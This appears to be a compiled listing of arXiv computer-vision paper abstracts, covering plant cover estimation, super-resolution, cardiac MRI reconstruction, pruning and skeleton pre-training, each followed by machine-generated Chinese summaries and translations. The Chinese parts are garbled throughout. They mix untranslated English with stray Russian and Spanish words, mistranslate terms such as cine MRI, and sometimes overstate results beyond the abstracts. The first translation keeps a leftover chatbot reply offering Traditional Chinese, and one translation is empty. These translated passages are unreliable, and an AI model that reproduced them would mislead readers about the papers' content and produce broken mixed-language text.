The plant community composition is an essential indicator of environmental changes and is, for this reason, usually analyzed in ecological field studies in terms of the so-called plant cover. The manual acquisition of this kind of data is time-consuming, laborious, and prone to human error. Automated camera systems can collect high-resolution images of the surveyed vegetation plots at a high frequency. In combination with subsequent algorithmic analysis, it is possible to objectively extract information on plant community composition quickly and with little human effort. An automated camera system can easily collect the large amounts of image data necessary to train a Deep Learning system for automatic analysis. However, due to the amount of work required to annotate vegetation images with plant cover data, only few labeled samples are available. As automated camera systems can collect many pictures without labels, we introduce an approach to interpolate the sparse labels in the collected vegetation plot time series down to the intermediate dense and unlabeled images to artificially increase our training dataset to seven times its original size. Moreover, we introduce a new method we call Monte-Carlo Cropping. This approach trains on a collection of cropped parts of the training images to deal with high-resolution images efficiently, implicitly augment the training images, and speed up training. We evaluate both approaches on a plant cover dataset containing images of herbaceous plant communities and find that our methods lead to improvements in the species, community, and segmentation metrics investigated.

摘要
plant 社区组成是环境变化的重要指标，因此通常在生态场景研究中用 Plant cover 来进行分析。 however， manual acquisition of this kind of data is time-consuming, laborious, and prone to human error。 automatic camera systems can collect high-resolution images of the surveyed vegetation plots at a high frequency，并且可以使用后续的算法分析以获取植物社区组成的信息。 due to the amount of work required to annotate vegetation images with plant cover data， only a few labeled samples are available。 therefore， we introduce an approach to interpolate the sparse labels in the collected vegetation plot time series down to the intermediate dense and unlabeled images to artificially increase our training dataset to seven times its original size。 furthermore， we introduce a new method called Monte-Carlo Cropping。 this approach trains on a collection of cropped parts of the training images to deal with high-resolution images efficiently， implicitly augment the training images， and speed up training。we evaluate both approaches on a plant cover dataset containing images of herbaceous plant communities and find that our methods lead to improvements in the species， community， and segmentation metrics investigated。Note: The translation is in Simplified Chinese, which is the standard form of Chinese used in mainland China and Singapore. If you prefer Traditional Chinese, please let me know.

Reconstructed Convolution Module Based Look-Up Tables for Efficient Image Super-Resolution

paper_url: http://arxiv.org/abs/2307.08544
repo_url: https://github.com/liuguandu/rc-lut
paper_authors: Guandu Liu, Yukang Ding, Mading Li, Ming Sun, Xing Wen, Bin Wang
for: 提高单图超分辨率（SR）任务中的灵活性和效率。
methods: 提出了一种新的重构 convolution（RC）模块，通过分离通道和空间计算来减少 LUT 的存储量，同时可以扩大 RF 的大小。
results: 比对于 state-of-the-art LUT-based SR 方法，提出的 RCLUT 方法可以在五个 популяр的benchmark dataset上 achieve 9 倍的 RF 大小扩展和优秀的性能，并且可以作为 LUT-based SR 方法的插件来提高其效果。

Abstract
Look-up table(LUT)-based methods have shown the great efficacy in single image super-resolution (SR) task. However, previous methods ignore the essential reason of restricted receptive field (RF) size in LUT, which is caused by the interaction of space and channel features in vanilla convolution. They can only increase the RF at the cost of linearly increasing LUT size. To enlarge RF with contained LUT sizes, we propose a novel Reconstructed Convolution(RC) module, which decouples channel-wise and spatial calculation. It can be formulated as $n^2$ 1D LUTs to maintain $n\times n$ receptive field, which is obviously smaller than $n\times n$D LUT formulated before. The LUT generated by our RC module reaches less than 1/10000 storage compared with SR-LUT baseline. The proposed Reconstructed Convolution module based LUT method, termed as RCLUT, can enlarge the RF size by 9 times than the state-of-the-art LUT-based SR method and achieve superior performance on five popular benchmark dataset. Moreover, the efficient and robust RC module can be used as a plugin to improve other LUT-based SR methods. The code is available at https://github.com/liuguandu/RC-LUT.

摘要
Look-up table（LUT）基本方法在单图超解像（SR）任务中表现出色。然而，之前的方法忽视了LUT中受限的接收场（RF）大小的重要原因，这是因为混合空间和通道特征导致的vanilla convolution中的交互作用。它们只能通过linearly增加LUT大小来增加RF。为了使RF增加而不是LUT大小，我们提出了一种新的Reconstructed Convolution（RC）模块，它可以将通道和空间计算解耦。它可以表示为n^2个1D LUT，以维持n×n的接收场，这比之前的n×nD LUT更小。我们的RC模块生成的LUT可以达到与SR-LUT基准值的less than 1/10000的存储量。我们提出的Reconstructed Convolution模块基于LUT方法，称为RCLUT，可以将RF大小提高9倍于当前LUT基本SR方法，并在五个流行的benchmark dataset上达到更高的性能。此外，RC模块可以作为LUT基本SR方法的插件来改进其性能。代码可以在https://github.com/liuguandu/RC-LUT中找到。

Variational Probabilistic Fusion Network for RGB-T Semantic Segmentation

paper_url: http://arxiv.org/abs/2307.08536
repo_url: None
paper_authors: Baihong Lin, Zengrong Lin, Yulan Guo, Yulan Zhang, Jianxiao Zou, Shicai Fan
for: 本研究旨在提高RGB-T semantic segmentation的精度和稳定性，以应对具有差异光照条件的困难景象。
methods: 本研究提出了一种新的Variational Probabilistic Fusion Network（VPFNet），它视融合特征为Random Variables，通过多个抽象样本来实现稳定的分类。在VPFNet中，Variational Feature Fusion Module（VFFM）通过差异注意力来实现随机样本生成。此外，为了避免类归一致和模式偏好，我们使用了Weighted Cross-Entropy损失函数，并在VFFM中引入了灯光和类别的先验信息。
results: 实验结果表明，提出的VPFNet可以在MFNet和PST900 dataset上达到当今最佳的分类性能。

Abstract
RGB-T semantic segmentation has been widely adopted to handle hard scenes with poor lighting conditions by fusing different modality features of RGB and thermal images. Existing methods try to find an optimal fusion feature for segmentation, resulting in sensitivity to modality noise, class-imbalance, and modality bias. To overcome the problems, this paper proposes a novel Variational Probabilistic Fusion Network (VPFNet), which regards fusion features as random variables and obtains robust segmentation by averaging segmentation results under multiple samples of fusion features. The random samples generation of fusion features in VPFNet is realized by a novel Variational Feature Fusion Module (VFFM) designed based on variation attention. To further avoid class-imbalance and modality bias, we employ the weighted cross-entropy loss and introduce prior information of illumination and category to control the proposed VFFM. Experimental results on MFNet and PST900 datasets demonstrate that the proposed VPFNet can achieve state-of-the-art segmentation performance.

摘要

Multi-class point cloud completion networks for 3D cardiac anatomy reconstruction from cine magnetic resonance images

paper_url: http://arxiv.org/abs/2307.08535
repo_url: None
paper_authors: Marcel Beetz, Abhirup Banerjee, Julius Ossenberg-Engels, Vicente Grau
For: 这个论文的目的是提出一种全自动的三维心脏形态重建方法，以便从硬件磁共振成像（cine MRI）获得三维心脏形态模型。* Methods: 这个方法使用了一种多类点云完成网络（PCCN）来解决3D重建任务中的稀疏性和重合性问题。PCCN在大量的synthetic数据集上进行了评估，并与标准 Referenced anatomy 之间的Chamfer距离在不同的扭曲程度下都在或类似于图像分辨率下。此外，与3D U-Net Referenced 模型相比，PCCN减少了重建错误的比例，即 Hausdorff 距离和平均表面距离减少了32%和24%。* Results: 然后，作者使用PCCN作为自动重建管道的一部分，对UK Biobank研究中的1000名参与者进行了cross-domain传送。结果显示，PCCN可以重建 precisemedical 和可靠的三维心脏形态模型，并与之前的 литераature 中的临床指标相符。此外，作者还调查了该方法的稳定性，并发现它可以成功处理多种常见异常情况。

Abstract
Cine magnetic resonance imaging (MRI) is the current gold standard for the assessment of cardiac anatomy and function. However, it typically only acquires a set of two-dimensional (2D) slices of the underlying three-dimensional (3D) anatomy of the heart, thus limiting the understanding and analysis of both healthy and pathological cardiac morphology and physiology. In this paper, we propose a novel fully automatic surface reconstruction pipeline capable of reconstructing multi-class 3D cardiac anatomy meshes from raw cine MRI acquisitions. Its key component is a multi-class point cloud completion network (PCCN) capable of correcting both the sparsity and misalignment issues of the 3D reconstruction task in a unified model. We first evaluate the PCCN on a large synthetic dataset of biventricular anatomies and observe Chamfer distances between reconstructed and gold standard anatomies below or similar to the underlying image resolution for multiple levels of slice misalignment. Furthermore, we find a reduction in reconstruction error compared to a benchmark 3D U-Net by 32% and 24% in terms of Hausdorff distance and mean surface distance, respectively. We then apply the PCCN as part of our automated reconstruction pipeline to 1000 subjects from the UK Biobank study in a cross-domain transfer setting and demonstrate its ability to reconstruct accurate and topologically plausible biventricular heart meshes with clinical metrics comparable to the previous literature. Finally, we investigate the robustness of our proposed approach and observe its capacity to successfully handle multiple common outlier conditions.

摘要
临床磁共振成像（MRI）是当前的黄金标准 для心脏解剖和功能评估。然而，它通常只能获取心脏的二维（2D）slice图像，因此限制了我们对健康和疾病心脏解剖和physiology的理解和分析。在这篇论文中，我们提出了一种全自动的表面重建管线，可以从raw磁共振成像获取多类3D心脏解剖模型。其关键组件是一种多类点云完成网络（PCCN），可以同时 corrrect both the sparsity和misalignment Issues of the 3D reconstruction task in a unified model。我们首先在大量的synthetic数据集上评估PCCN，并观察到Chamfer距离与 golden standard anatomy之间的距离在多个slice misalignment情况下都在或类似于图像分辨率下。此外，我们发现PCCN比 benchmark 3D U-Net的重建误差下降32%和24%。我们然后将PCCN作为自动重建管线的一部分应用于UK Biobank研究中的1000名研究对象，并示出了它能够重建准确和topologically plausible的心脏解剖模型，与前一代 литераature中的临床 metric相当。最后，我们调查了我们提议的方法的稳定性，并发现它可以成功处理多种常见异常情况。

Multi-Domain Learning with Modulation Adapters

paper_url: http://arxiv.org/abs/2307.08528
repo_url: None
paper_authors: Ekaterina Iakovleva, Karteek Alahari, Jakob Verbeek
for: 这篇论文是为了解决多个领域的图像分类问题，以及对不同领域的图像进行共同训练。
methods: 这篇论文使用了卷积 neural network，并将卷积权重更新为每个任务的对应领域特有的权重。
results: 这篇论文在Visual Decathlon挑战和ImageNet-to-Sketch benchmark上取得了出色的结果，其精度与现有的州先进方法相似或更高。

Abstract
Deep convolutional networks are ubiquitous in computer vision, due to their excellent performance across different tasks for various domains. Models are, however, often trained in isolation for each task, failing to exploit relatedness between tasks and domains to learn more compact models that generalise better in low-data regimes. Multi-domain learning aims to handle related tasks, such as image classification across multiple domains, simultaneously. Previous work on this problem explored the use of a pre-trained and fixed domain-agnostic base network, in combination with smaller learnable domain-specific adaptation modules. In this paper, we introduce Modulation Adapters, which update the convolutional filter weights of the model in a multiplicative manner for each task. Parameterising these adaptation weights in a factored manner allows us to scale the number of per-task parameters in a flexible manner, and to strike different parameter-accuracy trade-offs. We evaluate our approach on the Visual Decathlon challenge, composed of ten image classification tasks across different domains, and on the ImageNet-to-Sketch benchmark, which consists of six image classification tasks. Our approach yields excellent results, with accuracies that are comparable to or better than those of existing state-of-the-art approaches.

摘要
深度卷积网络在计算机视觉领域具有广泛的应用，这是因为它们在不同任务和领域上表现出色。然而，模型们通常是单独进行每个任务的训练，不利用任务和领域之间的相互关系，以学习更加紧凑的模型，并在低数据 regime 中更好地泛化。多元领域学习旨在处理相关的任务，如图像分类领域中的多个任务。先前的工作中使用了预训练和固定的域名不同的基础网络，并与更小的可学习的域pecific适应模块进行组合。在这篇论文中，我们引入了调整器（Modulation Adapters），它们可以在每个任务中对卷积权重进行更新，并在多任务情况下共享参数。我们可以在 фактор化的方式下参数化这些适应权重，以便在灵活的方式下增加每个任务的参数数量，并在精度和准确性之间进行负担平衡。我们在Visual Decathlon挑战和ImageNet-to-Sketch benchmark上进行评估，并取得了出色的结果，与现有状态的方法相比，我们的方法的准确率更高。

BUS:Efficient and Effective Vision-language Pre-training with Bottom-Up Patch Summarization

paper_url: http://arxiv.org/abs/2307.08504
repo_url: None
paper_authors: Chaoya Jiang, Haiyang Xu, Wei Ye, Qinghao Ye, Chenliang Li, Ming Yan, Bin Bi, Shikun Zhang, Fei Huang, Songfang Huang
for: 这个论文主要旨在提高 ViT 模型在视觉语言理解和生成任务中的训练效率，而不 sacrifi 性能。
methods: 该论文提出了一种底向概括方法，称为 Bottom-Up Patch Summarization (BUS)，它在 ViT 底层EXTRACT 和顶层 ABSTRACT 之间协调底层EXTRACT 和顶层 ABSTRACT，以学习高效的视觉概括。
results: 该论文在多个视觉语言理解和生成任务中表现竞争力强，而且可以提高训练效率达 50%，同时保持或者提高效果。此外，该模型在增加输入图像分辨率时可以不增加计算成本，而达到领先的性能。

Abstract
Vision Transformer (ViT) based Vision-Language Pre-training (VLP) models have demonstrated impressive performance in various tasks. However, the lengthy visual token sequences fed into ViT can lead to training inefficiency and ineffectiveness. Existing efforts address the challenge by either bottom-level patch extraction in the ViT backbone or top-level patch abstraction outside, not balancing training efficiency and effectiveness well. Inspired by text summarization in natural language processing, we propose a Bottom-Up Patch Summarization approach named BUS, coordinating bottom-level extraction and top-level abstraction to learn a concise summary of lengthy visual token sequences efficiently. Specifically, We incorporate a Text-Semantics-Aware Patch Selector (TSPS) into the ViT backbone to perform a coarse-grained visual token extraction and then attach a flexible Transformer-based Patch Abstraction Decoder (PAD) upon the backbone for top-level visual abstraction. This bottom-up collaboration enables our BUS to yield high training efficiency while maintaining or even improving effectiveness. We evaluate our approach on various visual-language understanding and generation tasks and show competitive downstream task performance while boosting the training efficiency by 50\%. Additionally, our model achieves state-of-the-art performance on many downstream tasks by increasing input image resolution without increasing computational costs over baselines.

摘要
视Transformer（ViT）基于视力语言预训练（VLP）模型在不同任务中表现出色。然而，在ViT中长时间的视觉 токен序列可能会导致训练不fficient和不effective。现有的尝试解决这个挑战是通过ViT backbone中的底层 patch抽取或者外部的top-level patch抽象，但这些方法并不能很好地寻求训练效率和效果的平衡。以文本概要为引yles，我们提出了底层 patch概要approach（BUS），通过协同底层抽取和顶层抽象来学习长时间的视觉 токен序列高效简洁的概要。specifically，我们在ViT backbone中添加了文本 semantics-aware patch selector（TSPS），以进行粗粒度的视觉 токен抽取，然后在backbone上添加一个灵活的 transformer-based patch abstraction decoder（PAD），以进行顶层视觉抽象。这种底层协同使得我们的BUS可以高效地进行训练，同时保持或者提高效果。我们在不同的视力语言理解和生成任务上评估了我们的方法，并显示了与基eline相比的50%的训练效率提升，同时在许多下游任务上达到了state-of-the-art的性能。此外，我们的模型可以在不变 computational costs的情况下，提高输入图像的分辨率，从而实现更好的下游任务性能。

Study of Vision Transformers for Covid-19 Detection from Chest X-rays

paper_url: http://arxiv.org/abs/2307.09402
repo_url: None
paper_authors: Sandeep Angara, Sharath Thirunagaru
for: 这种研究旨在检测 COVID-19 使用视transformer 技术，以提高检测效率和准确率。
methods: 本研究使用了许多最新的 transformer 模型，包括 Vision Transformer (ViT)、Swin-transformer、Max vision transformer (MViT) 和 Pyramid Vision transformer (PVT)，通过转移学习IMAGENET 的 weights，实现了惊人的准确率范围为 98.75% 到 99.5%。
results: 实验结果表明，视transformer 在 COVID-19 检测中达到了 estado-of-the-art 性能，高于传统方法和 Even Convolutional Neural Networks (CNNs)，这些结果表明了视transformer 的潜在力量作为 COVID-19 检测工具，有助于提高检测和诊断的效率和准确率在临床设置中。

Abstract
The COVID-19 pandemic has led to a global health crisis, highlighting the need for rapid and accurate virus detection. This research paper examines transfer learning with vision transformers for COVID-19 detection, known for its excellent performance in image recognition tasks. We leverage the capability of Vision Transformers to capture global context and learn complex patterns from chest X-ray images. In this work, we explored the recent state-of-art transformer models to detect Covid-19 using CXR images such as vision transformer (ViT), Swin-transformer, Max vision transformer (MViT), and Pyramid Vision transformer (PVT). Through the utilization of transfer learning with IMAGENET weights, the models achieved an impressive accuracy range of 98.75% to 99.5%. Our experiments demonstrate that Vision Transformers achieve state-of-the-art performance in COVID-19 detection, outperforming traditional methods and even Convolutional Neural Networks (CNNs). The results highlight the potential of Vision Transformers as a powerful tool for COVID-19 detection, with implications for improving the efficiency and accuracy of screening and diagnosis in clinical settings.

摘要
COVID-19 流行病毒引起全球健康危机，强调了快速和准确的病毒检测的需求。这篇研究论文研究了将转移学习应用于视Transformers 中的 COVID-19 检测，其在图像识别任务中表现出色。我们利用了视Transformers 的全球上下文捕捉和学习复杂模式的能力，对胸部X射像进行检测。在这个工作中，我们探索了最新的转移学习模型，包括视Transformer（ViT）、Swin-transformer、Maxvision transformer（MViT）和Pyramid Vision transformer（PVT）。通过使用IMAGENET 权重进行转移学习，这些模型在 COVID-19 检测中实现了98.75% 到 99.5% 的准确率范围。我们的实验表明，视Transformers 在 COVID-19 检测中达到了状态 искусственный智能的性能，超越传统方法和卷积神经网络（CNNs）。这些结果表明，视Transformers 可以作为COVID-19 检测的有力工具，并有可能提高诊断和检测的效率和准确率在临床设置中。

Cumulative Spatial Knowledge Distillation for Vision Transformers

paper_url: http://arxiv.org/abs/2307.08500
repo_url: None
paper_authors: Borui Zhao, Renjie Song, Jiajun Liang
for: 本研究旨在提高vision transformer（ViT）的性能，通过吸取 convolutional neural networks（CNN）的知识。
methods: 本研究提出了Cumulative Spatial Knowledge Distillation（CSKD）方法，通过从CNN的相应的空间响应中提取空间知识，对ViT的所有patchtoken进行适应。此外，CSKD还使用了Cumulative Knowledge Fusion（CKF）模块，通过在训练过程中逐渐增加CNN的全局响应的重要性，使得ViT能够在训练早期充分利用CNN的地方适应，在训练后期更好地利用ViT的全局能力。
results: 对于ImageNet-1k和下游 dataset，CSKD获得了超越原始ViT的性能。 code将公开。

Abstract
Distilling knowledge from convolutional neural networks (CNNs) is a double-edged sword for vision transformers (ViTs). It boosts the performance since the image-friendly local-inductive bias of CNN helps ViT learn faster and better, but leading to two problems: (1) Network designs of CNN and ViT are completely different, which leads to different semantic levels of intermediate features, making spatial-wise knowledge transfer methods (e.g., feature mimicking) inefficient. (2) Distilling knowledge from CNN limits the network convergence in the later training period since ViT's capability of integrating global information is suppressed by CNN's local-inductive-bias supervision. To this end, we present Cumulative Spatial Knowledge Distillation (CSKD). CSKD distills spatial-wise knowledge to all patch tokens of ViT from the corresponding spatial responses of CNN, without introducing intermediate features. Furthermore, CSKD exploits a Cumulative Knowledge Fusion (CKF) module, which introduces the global response of CNN and increasingly emphasizes its importance during the training. Applying CKF leverages CNN's local inductive bias in the early training period and gives full play to ViT's global capability in the later one. Extensive experiments and analysis on ImageNet-1k and downstream datasets demonstrate the superiority of our CSKD. Code will be publicly available.

摘要
精炼知识从卷积神经网络（CNN）是视transformer（ViT）的双刃剑。它会提高性能，因为图像友好的本地推导性（local-inductive bias）在CNN中帮助ViT更快速地学习和提高性能，但也存在两个问题：（1）CNN和ViT的网络设计完全不同，导致它们的中间特征semantic level不同，使得空间知识传递方法（例如特征模仿）不efficient。（2）从CNN精炼知识限制了ViT的网络迁移在后期训练中，因为ViT的全球信息整合能力被CNN的本地推导性supervise。为此，我们提出了积累的空间知识填充（CSKD）。CSKD将从CNN的相应空间响应中精炼到ViT的所有patchtoken中的空间知识，而不需要中间特征。此外，CSKD还利用了积累知识融合（CKF）模块，该模块在训练中逐渐增加CNN的全球响应的重要性，从而利用CNN的本地推导性在初期训练中，并让ViT在后期训练中发挥全球能力。我们在ImageNet-1k和下游数据集上进行了广泛的实验和分析，并证明了我们的CSKD的优越性。代码将在公共可用。

SVDFormer: Complementing Point Cloud via Self-view Augmentation and Self-structure Dual-generator

paper_url: http://arxiv.org/abs/2307.08492
repo_url: https://github.com/czvvd/svdformer
paper_authors: Zhe Zhu, Honghua Chen, Xing He, Weiming Wang, Jing Qin, Mingqiang Wei
for: 本文提出了一种新型网络SVDFormer，用于解决 incomplete point cloud 的两个特定挑战：理解完整的全球形状和生成高精度的本地结构。现有方法通常只使用三维坐标来识别形状模式，或者带有良好准备的颜色图像来引导geometry estimation的缺失部分。但这些方法并不总是能充分利用cross-modal自身结构来完成高质量的点云完成。
methods: 我们首先设计了一个Self-view Fusion Network，利用多视图深度图像信息来观察不完整的自身形状并生成一个紧凑的全球形状。然后，我们引入了一个改进模块，叫Self-structure Dual-generator，其中我们将学习的形状假设和地理自相似性 incorporated into producing new points。通过识别每个点的不完整性，我们实现了DUAL-PATH设计，使得各种精度的精细结构可以被独立地识别和修复。
results: 我们的方法在 widely-used benchmarks 上 achieve state-of-the-art performance。代码将在 https://github.com/czvvd/SVDFormer 上发布。

Abstract
In this paper, we propose a novel network, SVDFormer, to tackle two specific challenges in point cloud completion: understanding faithful global shapes from incomplete point clouds and generating high-accuracy local structures. Current methods either perceive shape patterns using only 3D coordinates or import extra images with well-calibrated intrinsic parameters to guide the geometry estimation of the missing parts. However, these approaches do not always fully leverage the cross-modal self-structures available for accurate and high-quality point cloud completion. To this end, we first design a Self-view Fusion Network that leverages multiple-view depth image information to observe incomplete self-shape and generate a compact global shape. To reveal highly detailed structures, we then introduce a refinement module, called Self-structure Dual-generator, in which we incorporate learned shape priors and geometric self-similarities for producing new points. By perceiving the incompleteness of each point, the dual-path design disentangles refinement strategies conditioned on the structural type of each point. SVDFormer absorbs the wisdom of self-structures, avoiding any additional paired information such as color images with precisely calibrated camera intrinsic parameters. Comprehensive experiments indicate that our method achieves state-of-the-art performance on widely-used benchmarks. Code will be available at https://github.com/czvvd/SVDFormer.

摘要
在这篇论文中，我们提出了一种新的网络，即SVDFormer，以解决Point cloud completion中的两个特定挑战：理解完整的全球形态从不完整的点云中，并生成高精度的本地结构。现有方法可以通过只使用3D坐标来识别形态模式，或者从外部Import预先calibrated的颜色图像来导航点云中缺失部分的准确性。但这些方法并不总能充分利用点云之间的自同构信息，以实现高质量的完成。为此，我们首先设计了一个自我融合网络，利用多视图深度图像信息来观察不完整的自身形态，并生成一个紧凑的全球形态。为了揭示高精度的结构，我们然后引入了一个改进模块，即自身结构双生成器，在其中我们利用学习的形态规范和几何自相似性来生成新的点。通过识别每个点的不完整性，我们的双路设计分离了各种精度的修正策略。SVDFormer利用自身结构的智慧，不需要任何额外的对应信息，如预先calibrated的颜色图像。广泛的实验表明，我们的方法在常用的 benchmark 上达到了领先的性能。代码将在https://github.com/czvvd/SVDFormer 上提供。

Differentiable Transportation Pruning

paper_url: http://arxiv.org/abs/2307.08483
repo_url: None
paper_authors: Yunqiang Li, Jan C. van Gemert, Torsten Hoefler, Bert Moons, Evangelos Eleftheriou, Bram-Ernst Verhoef
for: 该论文旨在提出一种高效的深度学习模型压缩方法，以便在边缘设备上部署深度学习模型。
methods: 该方法使用了一种高效的优化交通算法，该算法通过自动调整搜索-利用行为来找到精准的稀疏子网络。
results: 该方法可以在3个不同的数据集上，使用5种不同的模型，在各种压缩比例下，与之前的压缩方法进行比较，并且可以在不同的稀疏预算和压缩粒度下实现状态的最佳性能。

Abstract
Deep learning algorithms are increasingly employed at the edge. However, edge devices are resource constrained and thus require efficient deployment of deep neural networks. Pruning methods are a key tool for edge deployment as they can improve storage, compute, memory bandwidth, and energy usage. In this paper we propose a novel accurate pruning technique that allows precise control over the output network size. Our method uses an efficient optimal transportation scheme which we make end-to-end differentiable and which automatically tunes the exploration-exploitation behavior of the algorithm to find accurate sparse sub-networks. We show that our method achieves state-of-the-art performance compared to previous pruning methods on 3 different datasets, using 5 different models, across a wide range of pruning ratios, and with two types of sparsity budgets and pruning granularities.

摘要
深度学习算法在边缘部署中越来越普遍。然而，边缘设备具有限制的资源，因此需要有效地部署深度神经网络。剪辑方法是边缘部署中关键的工具，可以提高存储、计算、内存带宽和能源使用。在这篇论文中，我们提出了一种新的精准剪辑技术，可以准确控制输出网络大小。我们的方法使用高效的优化交通方案，我们使其成为终端到终端可微分的，自动调整搜索-利用行为，以找到精准的稀疏子网络。我们展示了我们的方法与之前的剪辑方法相比，在三个 datasets 上，使用五种模型，在各种剪辑比率、两种稀疏预算和剪辑粒度上均达到了状态 искусственный智能的表现。

SkeletonMAE: Graph-based Masked Autoencoder for Skeleton Sequence Pre-training

paper_url: http://arxiv.org/abs/2307.08476
repo_url: https://github.com/hongyan1123/skeletonmae
paper_authors: Hong Yan, Yang Liu, Yushen Wei, Zhen Li, Guanbin Li, Liang Lin
for: 这 paper 的目的是提出一种高效的人体序列学习框架，以便在不同的数据集上进行自动识别人体动作。
methods: 该 paper 使用了一种异symmetric graph-based encoder-decoder预训练架构，named SkeletonMAE，以及一种Spatiotemporal Representation Learning（STRL）模块，以完全捕捉人体姿势和获得有效的人体序列表示。
results: 该 paper 的实验结果表明，该方法可以在不同的数据集上提供优秀的自动识别人体动作性能，并且与一些完全监督的方法相当。

Abstract
Skeleton sequence representation learning has shown great advantages for action recognition due to its promising ability to model human joints and topology. However, the current methods usually require sufficient labeled data for training computationally expensive models, which is labor-intensive and time-consuming. Moreover, these methods ignore how to utilize the fine-grained dependencies among different skeleton joints to pre-train an efficient skeleton sequence learning model that can generalize well across different datasets. In this paper, we propose an efficient skeleton sequence learning framework, named Skeleton Sequence Learning (SSL). To comprehensively capture the human pose and obtain discriminative skeleton sequence representation, we build an asymmetric graph-based encoder-decoder pre-training architecture named SkeletonMAE, which embeds skeleton joint sequence into Graph Convolutional Network (GCN) and reconstructs the masked skeleton joints and edges based on the prior human topology knowledge. Then, the pre-trained SkeletonMAE encoder is integrated with the Spatial-Temporal Representation Learning (STRL) module to build the SSL framework. Extensive experimental results show that our SSL generalizes well across different datasets and outperforms the state-of-the-art self-supervised skeleton-based action recognition methods on FineGym, Diving48, NTU 60 and NTU 120 datasets. Additionally, we obtain comparable performance to some fully supervised methods. The code is avaliable at https://github.com/HongYan1123/SkeletonMAE.

摘要
skeleton sequence representation learning 对于动作认识表现出了非常出色的优势，这是因为它可以模型人体关节和结构。然而，当前的方法通常需要大量标注数据进行训练计算昂贵的模型，这是劳动密集和时间消耗的。此外，这些方法忽略了如何使用细腻的关节间依赖关系来预训练高效的skeleton sequence学习模型，以便在不同的数据集上进行泛化。在这篇论文中，我们提出了一种高效的skeleton sequence学习框架，名为Skeleton Sequence Learning（SSL）。为了全面捕捉人体姿势和获得特征的skeleton sequence表示，我们设计了一种偏 asymmetric graph-based encoder-decoder预训练架构，名为SkeletonMAE，它将skeleton关节序列嵌入图像 convolutional neural network（GCN）中，并在基于人体 topology知识的前提下重建屏蔽的关节和边。然后，我们将预训练的SkeletonMAE编码器与空间-时间表示学习（STRL）模块集成，构建了SSL框架。我们对多个数据集进行了广泛的实验，结果显示，我们的SSL可以在不同的数据集上进行泛化，并且比 estado-of-the-art的自我监督skeleton-based动作认识方法在FineGym、Diving48、NTU 60和NTU 120数据集上表现出色。此外，我们还获得了与一些完全监督方法相同的性能。代码可以在https://github.com/HongYan1123/SkeletonMAE中找到。

EGE-UNet: an Efficient Group Enhanced UNet for skin lesion segmentation

paper_url: http://arxiv.org/abs/2307.08473
repo_url: https://github.com/jcruan519/ege-unet
paper_authors: Jiacheng Ruan, Mingye Xie, Jingsheng Gao, Ting Liu, Yuzhuo Fu
for: 这篇研究旨在提出一个更有效的医疗影像分类方法，以应对现有的过滤器和其变体在医疗应用中的问题。
methods: 本研究提出了一个名为Efficient Group Enhanced UNet（EGE-UNet）的方法，具有轻量级的设计和实现。EGE-UNet具有Group multi-axis Hadamard Product Attention（GHPA）和Group Aggregation Bridge（GAB）两个模块，可以实现多轴 Hadamard Product Attention Mechanism 和多尺度信息聚合。
results: 实验结果显示，EGE-UNet在 ISIC2017 和 ISIC2018 datasets 上的分类性能比较现有的状态顶对方法高，同时对应用程序的参数和计算负载也有了显著的减少（494倍和160倍）。此外，EGE-UNet 的参数数量只有 50KB，这是现有方法中首次出现的最小化参数数量。

Abstract
Transformer and its variants have been widely used for medical image segmentation. However, the large number of parameter and computational load of these models make them unsuitable for mobile health applications. To address this issue, we propose a more efficient approach, the Efficient Group Enhanced UNet (EGE-UNet). We incorporate a Group multi-axis Hadamard Product Attention module (GHPA) and a Group Aggregation Bridge module (GAB) in a lightweight manner. The GHPA groups input features and performs Hadamard Product Attention mechanism (HPA) on different axes to extract pathological information from diverse perspectives. The GAB effectively fuses multi-scale information by grouping low-level features, high-level features, and a mask generated by the decoder at each stage. Comprehensive experiments on the ISIC2017 and ISIC2018 datasets demonstrate that EGE-UNet outperforms existing state-of-the-art methods. In short, compared to the TransFuse, our model achieves superior segmentation performance while reducing parameter and computation costs by 494x and 160x, respectively. Moreover, to our best knowledge, this is the first model with a parameter count limited to just 50KB. Our code is available at https://github.com/JCruan519/EGE-UNet.

摘要
transformer 和其变种在医学影像 segmentation 中广泛应用，但这些模型的参数数量和计算负担使其不适用于移动健康应用。为解决这个问题，我们提议一种更有效的方法，即高效组增强 U-Net (EGE-UNet)。我们在轻量级的情况下 интеGRoup 多轴 Hadamard Product Attention 模块 (GHPA) 和 Group Aggregation Bridge 模块 (GAB)。GHPA 将输入特征分组并在不同轴上执行 Hadamard Product Attention 机制 (HPA)，以提取多个视角的疾病信息。GAB 有效地融合多尺度信息，通过分组低级特征、高级特征和每个阶段生成的掩码。我们在 ISIC2017 和 ISIC2018 数据集上进行了全面的实验，结果表明 EGE-UNet 超过了现有的状态数据。简而言之，与 TransFuse 相比，我们的模型实现了更高的分 segmentation 性能，同时减少参数和计算成本494倍和160倍，分别。此外，我们知道这是首个参数数量限制在50KB之下的模型。我们的代码可以在中找到。

Riesz feature representation: scale equivariant scattering network for classification tasks

paper_url: http://arxiv.org/abs/2307.08467
repo_url: None
paper_authors: Tin Barisin, Jesus Angulo, Katja Schladitz, Claudia Redenbach
for: 文章主要用于提出一种基于里茨变换的特征表示方法，以避免采样缩scale维度的问题，并且具有等级平衡性。
methods: 本文使用里茨变换定义了一种新的特征表示方法，并详细分析了这种表示方法的数学基础。这种表示方法具有等级平衡性，并且与传统的散射网络相比，减少了特征数量四分之一。
results: 作者通过对 текстуre 分类和数字分类两个任务进行实验，证明了该方法可以具有比较好的性能，并且在不同的缩scale下保持稳定性。特别是在训练数据中不包含的缩scale下，该方法可以具有更好的性能。

Abstract
Scattering networks yield powerful and robust hierarchical image descriptors which do not require lengthy training and which work well with very few training data. However, they rely on sampling the scale dimension. Hence, they become sensitive to scale variations and are unable to generalize to unseen scales. In this work, we define an alternative feature representation based on the Riesz transform. We detail and analyze the mathematical foundations behind this representation. In particular, it inherits scale equivariance from the Riesz transform and completely avoids sampling of the scale dimension. Additionally, the number of features in the representation is reduced by a factor four compared to scattering networks. Nevertheless, our representation performs comparably well for texture classification with an interesting addition: scale equivariance. Our method yields superior performance when dealing with scales outside of those covered by the training dataset. The usefulness of the equivariance property is demonstrated on the digit classification task, where accuracy remains stable even for scales four times larger than the one chosen for training. As a second example, we consider classification of textures.

摘要
